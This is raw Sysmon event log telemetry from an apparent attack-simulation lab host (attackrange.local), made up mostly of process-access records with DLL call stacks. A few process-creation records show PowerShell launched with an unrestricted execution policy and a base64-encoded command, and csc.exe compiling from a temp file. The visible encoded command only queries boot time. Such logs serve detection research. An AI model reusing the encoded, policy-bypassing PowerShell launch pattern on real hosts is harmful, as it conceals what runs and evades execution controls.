12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.107{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-6440-6064-D902-00000000AD01}37122676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d8ed2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d894a|UNKNOWN(00007FF893A7BB0F) 154100x8000000000000000582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.113{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET 
FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\sdvgceyb.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 11241100x8000000000000000581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.cmdline2021-03-31 12:00:01.107 11241100x8000000000000000580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:00:01.107{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.dll2021-03-31 12:00:01.107 10341000x8000000000000000845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.982{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.967{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.967{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.967{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-6442-6064-E702-00000000AD01}43244776C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-6442-6064-E802-00000000AD01}39004464C:\Windows\system32\cmd.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x8000000000000000829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.955{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6442-6064-7EBF-120000000000}0x12bf7e0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6442-6064-E802-00000000AD01}3900C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 